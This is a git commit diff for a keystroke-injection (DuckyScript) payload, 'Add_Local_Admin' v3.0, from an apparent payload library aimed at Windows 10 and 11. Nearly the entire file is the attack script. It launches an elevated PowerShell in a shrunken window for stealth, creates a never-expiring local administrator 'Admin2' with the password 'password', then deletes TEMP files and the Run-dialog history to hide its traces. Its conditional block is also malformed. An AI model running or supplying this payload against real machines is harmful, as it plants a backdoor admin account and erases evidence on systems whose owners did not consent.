Merge pull request #459 from LulzAnarchyAnon/patch-16

Add_Local_Admin v 3.0
2024-06-11 23:42:25 -04:00 · 2024-06-11 23:42:25 -04:00 · 4dcec3ba6c
parent cd63cd6b2e 68997ce959
commit 4dcec3ba6c
1 changed files with 31 additions and 78 deletions
--- a/payloads/library/execution/Add_Local_Admin/payload.txt
+++ b/payloads/library/execution/Add_Local_Admin/payload.txt
@ -1,89 +1,42 @@
 REM Title: Add_Local_Admin
 REM Author: LulzAnarchyAnon
 REM Description: Administrator PowerShell is opened, and resized for a more stealthy payload delivery, then the payload
-REM creates a local admin account on the target system, afterwards powershell exits, and all history is cleared.
+REM creates a local admin account on the target system, afterwards powershell exits, and all history is cleared. 
 REM This lightning fast payload deployed, and was completed in a test run in 10.57 seconds
 REM Target: Windows 10 and 11  
 REM Props: Darren Kitchen, and I am Jakoby
-REM Version: 2.0
+REM Version: 3.0
 REM Category: Execution
-DELAY 1000
+
 DELAY 200
 GUI r
-DELAY 500
+DELAY 200
-STRING powershell -Command "Start-Process PowerShell -Verb RunAs"  
+STRINGLN powershell -Command "Start-Process PowerShell -Verb RunAs"  
 DELAY 500
 ENTER
 DELAY 500
 ALT y
 DELAY 1000
 STRING PowerShell.exe -noe -c ". mode.com con: lines=5 cols=12"
 DELAY 1000
 ENTER
 DELAY 1000
 STRING $Username = "Admin2"
 DELAY 1000
 ENTER
 STRING $Password = "password"
 DELAY 1000
 ENTER
 STRING $group = "Administrators"
 DELAY 1000
 ENTER
 STRING $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
 DELAY 1000
 ENTER
 STRING $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
 DELAY 1000
 ENTER
 STRING if ($existing -eq $null) {
 DELAY 1000
 ENTER
 STRING Write-Host "Creating new local user $Username."
 DELAY 1000
 ENTER
 STRING & NET USER $Username $Password /add /y /expires:never
 DELAY 1000  
 ENTER 
 STRING Write-Host "Adding local user $Username to $group."
 DELAY 1000
 ENTER
 STRING & NET LOCALGROUP $group $Username /add
 DELAY 1000
 ENTER
 STRING }
 DELAY 1000
 ENTER
 STRING      {
 DELAY 1000
 ENTER
 STRING Write-Host "Setting password for existing local user $Username."
 DELAY 1000
 ENTER
 STRING $existing.SetPassword($Password)
 DELAY 1000
 ENTER
 STRING }
 DELAY 1000
 ENTER
 STRING Write-Host "Ensuring password for $Username never expires."
 DELAY 1000
 ENTER
 STRING & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
 DELAY 1000
 ENTER
 DELAY 1000
 STRING rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
 DELAY 500
-ENTER
+STRINGLN
-DELAY 500
+                 PowerShell.exe -noe -c ". mode.com con: lines=5 cols=12"
-STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+                 $Username = "Admin2"
-DELAY 500
+                 $Password = "password"
-ENTER
+                 $group = "Administrators"
-DELAY 200
+                 $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
-STRING exit
+                 $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
-DELAY 200
+                 if ($existing -eq $null) {
-ENTER
+                 Write-Host "Creating new local user $Username."
-DELAY 200
+                 & NET USER $Username $Password /add /y /expires:never
-STRING exit
+                 Write-Host "Adding local user $Username to $group."
-DELAY 200 
+                 & NET LOCALGROUP $group $Username /add
-ENTER
+                 }
                 {
                Write-Host "Setting password for existing local user $Username."
                $existing.SetPassword($Password)
                }
               Write-Host "Ensuring password for $Username never expires."
               & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
               rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
               reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
               exit
               exit
 END_STRINGLN